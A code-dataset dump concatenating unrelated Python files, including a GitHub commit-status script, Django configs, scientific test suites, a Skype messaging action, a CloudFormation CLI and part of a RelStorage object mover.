"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "f66ad0f9-3ade-3f3e-a070-b1f5c9043ac3",
"x-amz-id-2": "y6rEwcgmg3F05eSo8bEqr2OMvkyFQwc8vCjClMZRRfU0fEq2vbR1lD2FC7v0rp43b1LY1acrEaQWjnjOXgBq/DkW39Fbznto",
"date": "Fri, 11 Oct 2019 10:51:56 GMT",
"content-type": "application/x-amz-json-1.1",
"content-length": "91441",
},
"RetryAttempts": 0,
},
}
|
StarcoderdataPython
|
3395023
|
#!/usr/bin/env python3
# Implements https://developer.github.com/v3/repos/statuses/#create-a-status
import argparse
import os
import requests
import sys
def SetCommitStatus(slug, hash, token, params):
url = "https://api.github.com/repos/%s/statuses/%s" % (slug, hash)
headers = {
"Authorization": "token %s" % token
}
r = requests.post(url, headers=headers, json=params)
if r.status_code != 201:
print("Error setting commit status: %s." % r.status_code)
sys.exit(1)
def Main():
token = os.getenv("GITHUB_ACCESS_TOKEN")
url = os.getenv("CIRCLE_BUILD_URL", default="http://mapbox.com")
context = "internal: " + os.getenv("CIRCLE_JOB", default="default")
parser = argparse.ArgumentParser(
description="Sets the status of a commit on GitHUB.")
parser.add_argument("--token", default=token,
help="GitHub token, otherwise environment GITHUB_API_TOKEN. Needs repo:status scope.")
parser.add_argument("--slug", default="mapbox/mapbox-gl-native",
help="Repository slug, example: mapbox/mapbox-gl-native.")
parser.add_argument("--hash", required=True,
help="Commit git hash.")
parser.add_argument("--success", dest="success", action="store_true",
help="The status of the commit, 'failure' if not set.")
parser.add_argument("--pending", dest="pending", action="store_true",
help="The status of the commit, 'failure' if not set.")
parser.add_argument("--url", default=url,
help="URL to associate with this status.")
parser.add_argument("--description",
help="A short description of the status.")
parser.add_argument("--context", default=context,
help="A string label to differentiate this status.")
args = parser.parse_args()
if not args.token:
print("GitHub token not set. Use --token or set GITHUB_ACCESS_TOKEN.")
sys.exit(1)
state = "failure"
description = "Your tests failed on MapboxCI"
if args.success:
state = "success"
description = "Your tests passed on MapboxCI!"
elif args.pending:
state = "pending"
description = "MapboxCI is running your tests"
if args.description:
description= args.description
params = {
"state": state,
"target_url": args.url,
"description": description,
"context": args.context
}
SetCommitStatus(args.slug, args.hash, args.token, params)
return 0
if __name__ == "__main__":
Main()
|
StarcoderdataPython
|
3299817
|
# proxy module
from traits.util.resource import *
|
StarcoderdataPython
|
4826096
|
import sys
# Django
from django.apps import AppConfig
# from django.core import checks
from django.utils.translation import gettext_lazy as _
class ConfConfig(AppConfig):
name = 'awx.conf'
verbose_name = _('Configuration')
def ready(self):
self.module.autodiscover()
if not set(sys.argv) & {'migrate', 'check_migrations'}:
from .settings import SettingsWrapper
SettingsWrapper.initialize()
|
StarcoderdataPython
|
1739441
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
(C) 2013 by <NAME>
Make sure that you paste some German and English text for
the extraction of language models in text-de-1.txt and
text-en-1.txt. The more text you put in these files,
the better it should be for your model generation.
"""
# https://github.com/dcavar/Py3L
from ngrams import makeNgramModel
# read file
ifp = open("text-de-1.txt", mode='r', encoding='utf8')
mytext = ifp.read()
ifp.close()
mymodel_de = makeNgramModel(mytext, 3)
total = sum(mymodel_de.values())
for key, value in mymodel_de.items():
mymodel_de[key] = value / total
# print(key, mymodel_de[key])
# read file
ifp = open("text-en-1.txt", mode='r', encoding='utf8')
mytext = ifp.read()
ifp.close()
mymodel_en = makeNgramModel(mytext, 3)
total = sum(mymodel_en.values())
for key, value in mymodel_en.items():
mymodel_en[key] = value / total
# print(key, mymodel_en[key])
mytext = "Dies ist ein kleiner Test."
mymodel_unk = makeNgramModel(mytext, 3)
total = sum(mymodel_unk.values())
en_dist = 0.0
de_dist = 0.0
for key, value in mymodel_unk.items():
mymodel_unk[key] = value / total
en_dist += abs(mymodel_en.get(key, 1) - mymodel_unk[key])
de_dist += abs(mymodel_de.get(key, 1) - mymodel_unk[key])
print(mytext)
print(en_dist, de_dist)
if en_dist < de_dist:
print("This text is English!")
else:
print("This text is German!")
|
StarcoderdataPython
|
56284
|
<gh_stars>0
#!/usr/bin/env python3
"""
Tools to truncate functional images to remove all data recorded before the first stimulus.
To use, call main().
Created on 7/6/2021 by <NAME>.
"""
# Standard Python modules.
from os import PathLike
import subprocess
def main(onsets_path: PathLike, func_path: PathLike, out_prefix: PathLike) -> None:
"""
Truncate our images!
"""
new_start_volume = _get_volume(_get_start_time(onsets_path))
truncate_volumes(func_path, new_start_volume, out_prefix)
def main2(new_start_volume: int, func_path: PathLike, out_prefix: PathLike) -> None:
"""
Truncate our images! But this time, using a start volume rather than adjusting the image to some onsets.
"""
truncate_volumes(func_path, new_start_volume, out_prefix)
def _get_start_time(onsets_path: PathLike) -> float:
"""
Returns the first onset time.
"""
with open(onsets_path, "r") as f:
onsets = f.readlines()
return float(onsets[0])
def _get_volume(time_in_seconds: float) -> int:
"""
Returns the volume containing the indicated time point.
"""
return int((time_in_seconds - time_in_seconds % 2) / 2)
def truncate_volumes(func_path: PathLike, new_start_volume: int, out_prefix: PathLike):
"""
Removes volumes from the beginning of a 4D image. Returns the path to the .HEAD outfile.
"""
command = [
"3dTcat",
f"{func_path}[{new_start_volume}..$]",
"-prefix", out_prefix,
]
subprocess.run(command)
|
StarcoderdataPython
|
3224749
|
import os
import sys
import tkinter as tkinter
import gobject
from gi.repository import gst
def on_sync_message(bus, message, window_id):
if not message.structure is None:
if message.structure.get_name() == 'prepare-xwindow-id':
image_sink = message.src
image_sink.set_property('force-aspect-ratio', True)
image_sink.set_xwindow_id(window_id)
gobject.threads_init()
window = tkinter.Tk()
window.geometry('500x400')
video = tkinter.Frame(window, bg='#000000')
video.pack(side=tkinter.BOTTOM,anchor=tkinter.S,expand=tkinter.YES,fill=tkinter.BOTH)
window_id = video.winfo_id()
player = gst.element_factory_make('playbin2', 'player')
player.set_property('video-sink', None)
player.set_property('uri', 'file://%s' % (os.path.abspath(sys.argv[1])))
player.set_state(gst.STATE_PLAYING)
bus = player.get_bus()
bus.add_signal_watch()
bus.enable_sync_message_emission()
bus.connect('sync-message::element', on_sync_message, window_id)
window.mainloop()
|
StarcoderdataPython
|
3364473
|
""" The different objects which can be declared. """
# pylint: disable=R0903
from .types import CType
class CDeclaration:
""" A single declaration """
def __init__(self, storage_class, typ: CType, name, location):
assert isinstance(typ, CType)
assert isinstance(name, str) or name is None
self.name = name
self.location = location
self.typ = typ
self.storage_class = storage_class
@property
def is_function(self):
return isinstance(self, FunctionDeclaration)
class Typedef(CDeclaration):
""" Type definition """
def __init__(self, typ, name, location):
super().__init__('typedef', typ, name, location)
def __repr__(self):
return 'Typedef {}'.format(self.name)
class VariableDeclaration(CDeclaration):
""" Variable declaration, be it local or global """
def __init__(self, storage_class, typ, name, initial_value, location):
super().__init__(storage_class, typ, name, location)
self.initial_value = initial_value
def __repr__(self):
return 'Variable [storage={} typ={} name={}]'.format(
self.storage_class, self.typ, self.name)
class ConstantDeclaration(CDeclaration):
def __init__(self, storage_class, typ, name, value, location):
super().__init__(storage_class, typ, name, location)
self.value = value
def __repr__(self):
return 'Constant [typ={} name={}, {}]'.format(
self.typ, self.name, self.value)
class EnumDeclaration(CDeclaration):
def __init__(self, constants, location):
super().__init__(location)
self.constants = constants
class EnumConstantDeclaration(CDeclaration):
""" Declaration of an enum value """
def __init__(self, typ, name, value, location):
super().__init__(None, typ, name, location)
self.value = value
def __repr__(self):
return 'Value [typ={} name={}, {}]'.format(
self.typ, self.name, self.value)
class ParameterDeclaration(CDeclaration):
""" Function parameter declaration """
def __repr__(self):
return 'Parameter [typ={} name={}]'.format(
self.typ, self.name)
class FunctionDeclaration(CDeclaration):
""" A function declaration """
def __init__(self, storage_class, typ, name, location):
super().__init__(storage_class, typ, name, location)
self.body = None
def __repr__(self):
return 'Function storage={} typ={} name={}'.format(
self.storage_class, self.typ, self.name)
|
StarcoderdataPython
|
3297167
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy import units as u
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from gammapy.irf import EnergyDependentMultiGaussPSF
from gammapy.utils.testing import mpl_plot_check, requires_data, requires_dependency
@requires_data()
class TestEnergyDependentMultiGaussPSF:
@pytest.fixture(scope="session")
def psf(self):
filename = "$GAMMAPY_DATA/tests/unbundled/irfs/psf.fits"
return EnergyDependentMultiGaussPSF.read(filename, hdu="POINT SPREAD FUNCTION")
def test_info(self, psf):
info_str = open(get_pkg_data_filename("data/psf_info.txt")).read()
assert psf.info() == info_str
def test_write(self, tmp_path, psf):
psf.write(tmp_path / "tmp.fits")
with fits.open(tmp_path / "tmp.fits", memmap=False) as hdu_list:
assert len(hdu_list) == 2
def test_to_table_psf(self, psf):
energy = 1 * u.TeV
theta = 0 * u.deg
rad = np.linspace(0, 2, 300) * u.deg
table_psf = psf.to_energy_dependent_table_psf(theta, rad=rad)
psf_at_energy = psf.psf_at_energy_and_theta(energy, theta)
containment = [0.68, 0.8, 0.9]
desired = [psf_at_energy.containment_radius(_) for _ in containment]
table_psf_at_energy = table_psf.table_psf_at_energy(energy)
actual = table_psf_at_energy.containment_radius(containment)
assert_allclose(desired, actual.degree, rtol=1e-2)
def test_to_psf3d(self, psf):
rads = np.linspace(0.0, 1.0, 101) * u.deg
psf_3d = psf.to_psf3d(rads)
assert psf_3d.rad_axis.nbin == 100
assert psf_3d.rad_axis.unit == "deg"
theta = 0.5 * u.deg
energy = 0.5 * u.TeV
containment = [0.68, 0.8, 0.9]
desired = np.array(
[psf.containment_radius(energy, theta, _).value for _ in containment]
)
actual = np.array(
[psf_3d.containment_radius(energy, theta, _).value for _ in containment]
)
assert_allclose(np.squeeze(desired), actual, atol=0.005)
@requires_dependency("matplotlib")
def test_peek(self, psf):
with mpl_plot_check():
psf.peek()
@requires_data()
def test_psf_cta_1dc():
filename = (
"$GAMMAPY_DATA/cta-1dc/caldb/data/cta/1dc/bcf/South_z20_50h/irf_file.fits"
)
psf_irf = EnergyDependentMultiGaussPSF.read(filename, hdu="POINT SPREAD FUNCTION")
# Check that PSF is filled with 0 for energy / offset where no PSF info is given.
# This is needed so that stacked PSF computation doesn't error out,
# trying to interpolate for observations / energies where this occurs.
psf = psf_irf.to_energy_dependent_table_psf("4.5 deg")
psf = psf.table_psf_at_energy("0.05 TeV")
assert_allclose(psf.evaluate(rad="0.03 deg").value, 0)
# Check that evaluation works for an energy / offset where an energy is available
psf = psf_irf.to_energy_dependent_table_psf("2 deg")
psf = psf.table_psf_at_energy("1 TeV")
assert_allclose(psf.containment_radius(0.68).deg, 0.052841, atol=1e-4)
|
StarcoderdataPython
|
1708137
|
<reponame>rupakc/NeuralSearchSpace<gh_stars>1-10
LOCAL_MONGO_HOSTNAME = 'localhost'
LOCAL_MONGO_PORT = 27017
EXPIRE_TIME = 1000
DB_NAME = 'Optimization'
COLLECTION_NAME = 'NeuralSearchSpace'
|
StarcoderdataPython
|
3202242
|
from __future__ import annotations
from dnnv.properties.expressions.base import Expression
from ...expressions import BinaryExpression, Call
from ..base import GenericExpressionTransformer
from ._calls import FunctionSubstitutor
from ...visitors import DetailsInference
class SubstituteCalls(GenericExpressionTransformer):
def __init__(self, form="dnf"):
super().__init__()
# `form` provides a hint to the substitutor on how to efficiently
# format the substitution expression
self.form = form
def visit(self, expression):
if self._top_level:
DetailsInference().visit(expression)
return super().visit(expression)
def visit_BinaryExpression(self, expression: BinaryExpression) -> BinaryExpression:
expr_type = type(expression)
expr1 = expression.expr1
expr2 = expression.expr2
if isinstance(expr1, Call) and expr1.function.is_concrete:
substitutor = FunctionSubstitutor.lookup(expr1.function.value)
binexpr_substitute_method = f"substitute_{expr_type.__name__}"
if substitutor is not None and hasattr(
substitutor, binexpr_substitute_method
):
result = getattr(substitutor, binexpr_substitute_method)(
expr1, expr2, form=self.form
)
if result is not NotImplemented:
return self.visit(result)
elif isinstance(expr2, Call) and expr2.function.is_concrete:
substitutor = FunctionSubstitutor.lookup(expr2.function.value)
binexpr_substitute_method = f"substitute_{expr_type.__name__}"
if substitutor is not None and hasattr(
substitutor, binexpr_substitute_method
):
result = getattr(substitutor, binexpr_substitute_method)(
expr1, expr2, form=self.form
)
if result is not NotImplemented:
return self.visit(result)
return expr_type(self.visit(expr1), self.visit(expr2))
def visit_Call(self, expression: Call) -> Expression:
function = self.visit(expression.function)
args = tuple([self.visit(arg) for arg in expression.args])
kwargs = {name: self.visit(value) for name, value in expression.kwargs.items()}
if function.is_concrete:
substitutor = FunctionSubstitutor.lookup(function.value)
if substitutor is not None:
result = substitutor(function, *args, **kwargs)
if result is not NotImplemented:
return result
expr = Call(function, args, kwargs)
return expr
def visit_Not(self, expression):
form = self.form
self.form = "cnf" if form == "dnf" else "dnf"
result = super().generic_visit(expression)
self.form = form
return result
__all__ = ["SubstituteCalls"]
|
StarcoderdataPython
|
3365822
|
<reponame>lucky-luk3/msticpy
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import math
import os
import unittest
from pathlib import Path
import folium
import nbformat
import pandas as pd
import pytest
from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
from msticpy.datamodel.entities import GeoLocation, Host, IpAddress
from msticpy.nbtools.foliummap import (
FoliumMap,
get_center_geo_locs,
get_center_ip_entities,
get_map_center,
)
from ..unit_test_lib import TEST_DATA_PATH
_NB_FOLDER = "docs/notebooks"
_NB_NAME = "FoliumMap.ipynb"
class TestFoliumMap(unittest.TestCase):
"""Unit test class."""
def test_folium_map(self):
# Read in some data
ip_locs_file = Path(TEST_DATA_PATH).joinpath("ip_locs.csv")
geo_loc_df = pd.read_csv(ip_locs_file, index_col=0)
# Create IP and GeoLocation Entities from the dataframe
geo_locs = list(geo_loc_df.apply(create_geo_entity, axis=1).values)
ip_entities = list(geo_loc_df.apply(create_ip_entity, axis=1).values)
folium_map = FoliumMap(
width="50%", height="50%", location=(47.5982328, -122.331), zoom_start=14
)
self.assertIsInstance(folium_map.folium_map, folium.Map)
for ip in ip_entities:
ip.AdditionalData.update({"name": "test", "role": "testrole"})
folium_map = FoliumMap(zoom_start=9)
folium_map.add_ip_cluster(ip_entities=ip_entities, color="orange")
ip_entities_clean = [
ip
for ip in ip_entities
if ip.Location
and ip.Location.Latitude
and not math.isnan(ip.Location.Latitude)
and not math.isnan(ip.Location.Longitude)
]
self.assertEqual(len(ip_entities_clean), len(folium_map.locations))
folium_map.add_ip_cluster(ip_entities=ip_entities_clean)
folium_map.center_map()
folium_map.add_geoloc_cluster(geo_locations=geo_locs, color="orange")
self.assertEqual(len(ip_entities_clean) * 3, len(folium_map.locations))
geo_tuples = geo_loc_df.apply(
lambda x: (x.Latitude, x.Longitude), axis=1
).values
folium_map.add_locations(locations=geo_tuples, color="orange")
self.assertEqual(len(ip_entities_clean) * 4, len(folium_map.locations))
# test centering algorithms
center = get_center_geo_locs(geo_locs)
self.assertAlmostEqual(center[0], 38.7095)
self.assertAlmostEqual(center[1], -93.6112)
center = get_center_geo_locs(geo_locs, mode="mean")
self.assertAlmostEqual(center[0], 39.847162352941176)
self.assertAlmostEqual(center[1], -87.36079411764706)
center = get_center_ip_entities(ip_entities)
self.assertAlmostEqual(center[0], 38.7095)
self.assertAlmostEqual(center[1], -93.6112)
hosts = []
for ip in ip_entities:
new_host = Host(HostName=ip.Address)
new_host.ip = ip
hosts.append(new_host)
center = get_map_center(entities=hosts)
self.assertAlmostEqual(center[0], 39.847162352941176)
self.assertAlmostEqual(center[1], -87.36079411764706)
@pytest.mark.skipif(
not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
)
def test_folium_map_notebook(self):
nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
abs_path = Path(_NB_FOLDER).absolute()
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
try:
ep.preprocess(nb, {"metadata": {"path": abs_path}})
except CellExecutionError:
nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
msg = f"Error executing the notebook '{nb_path}'.\n"
msg += f"See notebook '{nb_err}' for the traceback."
print(msg)
with open(nb_err, mode="w", encoding="utf-8") as f:
nbformat.write(nb, f)
raise
def create_ip_entity(row):
ip_ent = IpAddress(Address=row["AllExtIPs"])
geo_loc = create_geo_entity(row)
ip_ent.Location = geo_loc
return ip_ent
def create_geo_entity(row):
# get subset of fields for GeoLocation
loc_props = row[
["CountryCode", "CountryName", "State", "City", "Longitude", "Latitude"]
]
geo_loc = GeoLocation(**loc_props.to_dict())
return geo_loc
|
StarcoderdataPython
|
3277388
|
from django.contrib import admin
from .models import Brouwersdag, Competition, Exhibitor, ShowCasedModel
@admin.register(ShowCasedModel)
class ShowCasedModelAdmin(admin.ModelAdmin):
list_display = (
"name",
"owner",
"scale",
"length",
"width",
"height",
"is_competitor",
"id",
)
list_filter = ("competition", "is_competitor", "is_paid", "brouwersdag", "scale")
search_fields = ("competition__name", "name", "owner__username")
@admin.register(Competition)
class CompetitionAdmin(admin.ModelAdmin):
list_display = (
"__str__",
"name",
"max_num_models",
"max_participants",
"is_current",
)
list_editable = ("name", "max_num_models", "max_participants", "is_current")
search_fields = ("name",)
class ExhibitorInline(admin.TabularInline):
model = Exhibitor
@admin.register(Brouwersdag)
class BrouwersdagAdmin(admin.ModelAdmin):
list_display = ("name", "date")
list_editable = ("date",)
search_fields = ("name",)
inlines = [ExhibitorInline]
|
StarcoderdataPython
|
3291873
|
"""
Push local state to AWS Cloudformation
"""
import collections
import sys
import click
import halo
from ..aws.cloudformation import Cloudformation
from ..exceptions import StackNotFound
from ..utils import (accounts_regions_and_names, class_filter, plural,
set_stacks)
@click.command()
@accounts_regions_and_names
@click.option('--force', is_flag=True)
@click.option('--use-existing-params', is_flag=True)
@click.option('--skip-tags', is_flag=True)
def push(ctx, accounts, regions, names, force, use_existing_params, skip_tags):
"""
Create/Update live stacks
"""
set_stacks(ctx)
count, found_stacks = class_filter(ctx.obj.stacks,
account=accounts,
region=regions,
name=names)
click.echo(f'Found {plural(count, "local stack")}')
describe_stacks = collections.defaultdict(dict)
to_change = []
for stack in found_stacks:
ctx.obj.debug(
f'Found {stack.name} in region {stack.region} with account number {stack.account_id}'
)
# If we have a small number of stacks, it's faster to just create changesets
if (len(found_stacks) < 20 or name or force or stack.purge):
if stack.purge:
ctx.obj.debug(f'Checking to see if {stack.name} still exists')
if not stack.exists:
continue
to_change.append(stack)
# Use describe stacks and compare STAX_HASH tag
else:
key = f'{stack.account},{stack.region}'
if key not in describe_stacks:
cf = Cloudformation(account=stack.account, region=stack.region)
with halo.Halo('Fetching stack status'):
describe_stacks[key] = cf.describe_stacks()
try:
stax_hash = [
tag['Value']
for tag in describe_stacks[key][stack.name]['Tags']
if tag['Key'] == 'STAX_HASH'
][0]
except (KeyError, IndexError):
stax_hash = None
if stack.pending_update(stax_hash):
to_change.append(stack)
if not found_stacks:
click.echo('No stacks found to update')
sys.exit(1)
print('{} to update... {}\n'.format(
plural(len(to_change), 'stack'),
[stack.name for stack in to_change] if to_change else ''))
# Update should be more common than create, so let's assume that and save time
for stack in to_change:
if stack.purge is False:
try:
stack.update(use_existing_params=use_existing_params,
skip_tags=skip_tags)
except StackNotFound:
stack.create()
else:
ctx.obj.debug(f'No change required for {stack.name}')
else:
if stack.exists:
stack.delete()
|
StarcoderdataPython
|
1649345
|
# -*- coding: utf-8 -*-
import argparse
import pdb
import traceback
from hashlib import md5
from typing import List, Tuple
def solve(door_id: str, verbose=False) -> Tuple[str, str]:
pword_one: List[str] = []
pword_two: List[str] = [None] * 8 # type: ignore
chars_left: int = 8
index: int = 0
while True:
digest = md5(bytearray(door_id + str(index), "utf-8")).hexdigest()
if digest.startswith("00000"):
if len(pword_one) < 8:
ch: str = digest[5]
pword_one.append(ch)
if verbose:
print(f"one: {index} {ch} {pword_one}")
if chars_left:
pos: str = digest[5]
ch = digest[6]
if pos >= "0" and pos <= "7":
position = ord(pos) - ord("0")
if not pword_two[position]:
pword_two[position] = ch
chars_left -= 1
if verbose:
print(f"two: {index} {pos} '{ch}' {pword_two}")
if len(pword_one) == 8 and not chars_left:
break
index += 1
one: str = "".join(pword_one)
two: str = "".join(pword_two)
return (one, two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Advent of Code - 2016 - Day 5 - How About a Nice Game of Chess?"
)
parser.add_argument(
"door_id",
type=str,
default="ffykfhsq",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"--verbose",
action="store_true",
default=False,
help="Display extra info. (Default: %(default)s)",
)
args = parser.parse_args()
try:
print(solve(args.door_id, verbose=args.verbose))
except Exception:
traceback.print_exc()
pdb.post_mortem()
|
StarcoderdataPython
|
4843213
|
import numpy as np
class MaxPool:
image_shape = [0, 0]
num_filters = 0
def forward(self, input_image):
"""
function for performing forward propagation
Parameters:
input_image : numpy array
Returns:
output : numpy array
"""
self.last_input = input_image
self.image_shape[0], self.image_shape[1], self.num_filters = input_image.shape
output = np.zeros(((self.image_shape[0]//2), (self.image_shape[1]//2), self.num_filters))
for i in range((self.image_shape[0] // 2)):
for j in range((self.image_shape[1] // 2)):
selected_region = input_image[(i*2):(i*2+2),(j*2):(j*2+2)]
output[i, j] = np.amax(selected_region, axis=(0, 1))
return output
def backprop(self, error):
"""
function for performing backward propagation
Parameters:
error : numpy array
Returns:
conv_error : numpy array
"""
conv_error = np.zeros(self.last_input.shape)
for i in range(self.last_input.shape[0]//2):
for j in range(self.last_input.shape[1]//2):
selected_region = self.last_input[(i * 2):(i * 2 + 2), (j * 2):(j * 2 + 2)]
h, w, f = selected_region.shape
amax = np.amax(selected_region, axis=(0, 1))
for i2 in range(h):
for j2 in range(w):
for f2 in range(f):
# If this pixel was the max value, copy the gradient to it.
if selected_region[i2, j2, f2] == amax[f2]:
conv_error[i * 2 + i2, j * 2 + j2, f2] = error[i, j, f2]
return conv_error
# def get_output_shape(self):
# return np.zeros(((self.image_shape[0]//2), (self.image_shape[1]//2), self.num_filters)).shape
|
StarcoderdataPython
|
3328117
|
<reponame>ywkpl/DataStructuresAndAlgorithms<filename>Queue/LinkedQuequ.py
from typing import TypeVar, Generic
T=TypeVar('T')
class Node(Generic[T]):
def __init__(self, data:T, next=None):
self.data=data
self._next=next
class LinkedQueue(Generic[T]):
def __init__(self, capacity:int):
self._capacity=capacity
self._head=None
self._len=0
def enqueue(self, value:T):
if not value:
return
node=Node[T](value)
self.enqueue_node(node)
def enqueue_node(self, node:Node[T]):
#队列满
if self.is_full():
print('队列满了!')
return
if not self._head:
self._head=node
self._len+=1
return
node._next=self._head
self._head=node
self._len+=1
def is_empty(self)->bool:
return self._len==0
def is_full(self)->bool:
return self._len==self._capacity
def dequeue(self):
if self.is_empty():
return
if not self._head._next:
self._head=None
self._len-=1
return
prev=self._head
while prev._next._next:
prev=prev._next
prev._next=None
self._len-=1
def len(self):
return self._len
def print_all(self):
if not self._head:
return
cur=self._head
while cur:
print(cur.data)
cur=cur._next
def test_LinkedQueue():
print('初始化长度5整型队列')
queue=LinkedQueue[int](5)
assert queue.is_empty()
queue.enqueue(2)
queue.enqueue(3)
queue.enqueue(5)
queue.enqueue(88)
queue.enqueue(9)
assert queue.is_full()
queue.print_all()
print('满队列测试')
queue.dequeue()
queue.dequeue()
queue.dequeue()
print('出队列三次后:')
queue.print_all()
print('再进一次队:')
queue.enqueue(456)
queue.print_all()
queue.dequeue()
queue.dequeue()
queue.dequeue()
print('空队列测试')
queue.dequeue()
queue.print_all()
if __name__=="__main__":
test_LinkedQueue()
|
StarcoderdataPython
|
3233214
|
<reponame>Eloco/docker-action-send-skype
#!/usr/bin/env python
# coding=utf-8
import os
import emoji
from skpy import Skype, SkypeChats
import skpy
import time
import sys
import re
"""
Eloco
"""
def connect_skype(user=str, pwd=str):
print(f"""[init]Skype connecting <{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}>""")
sk=Skype(user,pwd)
print(f"""[init]Skype connected! <{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}>""")
return sk
def walk_file(file_dir):
L=[]
for root, dirs, files in os.walk(file_dir):
for file in files:
L.append(os.path.join(root, file))
return L
def skype_activate_send():
"""
[init] env
"""
sk =connect_skype(user=os.environ.get('INPUT_SKYPE_USERNAME'),pwd=os.environ.get('INPUT_SKYPE_PASSWORD'))
skype_ids =os.environ.get('INPUT_SKYPE_IDS')
send_msg_path =os.environ.get('GITHUB_WORKSPACE')+"/"+os.environ.get('INPUT_SEND_MSG_PATH')
send_file_path =os.environ.get('GITHUB_WORKSPACE')+"/"+os.environ.get('INPUT_SEND_FILE_PATH')
"""
[update] send something to id on skype
"""
def send_msg(ch,file_path):
message=open(file_path, "r").read()
ch.sendMsg(emoji.emojize(message,use_aliases=True)) # emoji support!
def send_file(ch,file_path):
file_name=os.path.basename(file_path)
is_image=True if re.match( r'.*\.(jpg|bmp|gif|ico|pcx|jpeg|tif|png|raw|tga)$', file_name, re.M|re.I) else False
ch.sendFile(open(file_path, "rb"), file_name,image=is_image)
def walk_and_run(send_func,file_path=str,ch=None):
if os.path.isdir(file_path):
for f in walk_file(file_path):
send_func(ch=ch,file_path=f)
elif os.path.isfile(file_path):
send_func(ch=ch,file_path=file_path)
for skype_id in skype_ids.strip().split():
ch = sk.chats[skype_id] if "@thread.skype" in skype_id else sk.contacts[skype_id].chat #sent to group chat or contact by id
walk_and_run(send_func=send_msg ,file_path=send_msg_path ,ch=ch)
walk_and_run(send_func=send_file,file_path=send_file_path,ch=ch)
if __name__ == '__main__':
skype_activate_send()
|
StarcoderdataPython
|
118641
|
<gh_stars>1-10
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""IObjectMover implementation.
"""
from __future__ import absolute_import
from perfmetrics import Metric
from relstorage.adapters.batch import RowBatcher
from relstorage.adapters.interfaces import IObjectMover
from relstorage.adapters._util import query_property as _query_property
from relstorage.adapters._util import noop_when_history_free
from relstorage.iter import fetchmany
from zope.interface import implementer
from hashlib import md5
from relstorage._compat import db_binary_to_bytes
metricmethod_sampled = Metric(method=True, rate=0.1)
@implementer(IObjectMover)
class AbstractObjectMover(object):
def __init__(self, database_type, options, runner=None,
Binary=None, version_detector=None,
batcher_factory=RowBatcher):
self.database_type = database_type
self.keep_history = options.keep_history
self.blob_chunk_size = options.blob_chunk_size
self.runner = runner
self.Binary = Binary
self.version_detector = version_detector
self.make_batcher = batcher_factory
@noop_when_history_free
def _compute_md5sum(self, data):
if data is None:
return None
return md5(data).hexdigest()
_load_current_queries = (
"""
SELECT state, tid
FROM current_object
JOIN object_state USING(zoid, tid)
WHERE zoid = %s
""",
"""
SELECT state, tid
FROM object_state
WHERE zoid = %s
""")
_load_current_query = _query_property('_load_current')
@metricmethod_sampled
def load_current(self, cursor, oid):
"""Returns the current pickle and integer tid for an object.
oid is an integer. Returns (None, None) if object does not exist.
"""
stmt = self._load_current_query
cursor.execute(stmt, (oid,))
# Note that we cannot rely on cursor.rowcount being
# a valid indicator. The DB-API doesn't require it, and
# some implementations, like MySQL Connector/Python are
# unbuffered by default and can't provide it.
row = cursor.fetchone()
if row:
state, tid = row
state = db_binary_to_bytes(state)
# If it's None, the object's creation has been
# undone.
return state, tid
return None, None
_load_revision_query = """
SELECT state
FROM object_state
WHERE zoid = %s
AND tid = %s
"""
@metricmethod_sampled
def load_revision(self, cursor, oid, tid):
"""Returns the pickle for an object on a particular transaction.
Returns None if no such state exists.
"""
stmt = self._load_revision_query
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
(state,) = row
return db_binary_to_bytes(state)
return None
_exists_queries = (
"SELECT 1 FROM current_object WHERE zoid = %s",
"SELECT 1 FROM object_state WHERE zoid = %s"
)
_exists_query = _query_property('_exists')
@metricmethod_sampled
def exists(self, cursor, oid):
"""Returns a true value if the given object exists."""
stmt = self._exists_query
cursor.execute(stmt, (oid,))
row = cursor.fetchone()
return row
@metricmethod_sampled
def load_before(self, cursor, oid, tid):
"""Returns the pickle and tid of an object before transaction tid.
Returns (None, None) if no earlier state exists.
"""
stmt = """
SELECT state, tid
FROM object_state
WHERE zoid = %s
AND tid < %s
ORDER BY tid DESC
LIMIT 1
"""
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
state, tid = row
state = db_binary_to_bytes(state)
# None in state means The object's creation has been undone
return state, tid
return None, None
@metricmethod_sampled
def get_object_tid_after(self, cursor, oid, tid):
"""Returns the tid of the next change after an object revision.
Returns None if no later state exists.
"""
stmt = """
SELECT tid
FROM object_state
WHERE zoid = %s
AND tid > %s
ORDER BY tid
LIMIT 1
"""
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
return row[0]
# NOTE: These are not database param escapes, they are Python
# escapes, so they shouldn't be translated to :1, etc.
_current_object_tids_queries = (
"SELECT zoid, tid FROM current_object WHERE zoid IN (%s)",
"SELECT zoid, tid FROM object_state WHERE zoid IN (%s)"
)
_current_object_tids_query = _query_property('_current_object_tids')
@metricmethod_sampled
def current_object_tids(self, cursor, oids):
"""Returns the current {oid: tid} for specified object ids."""
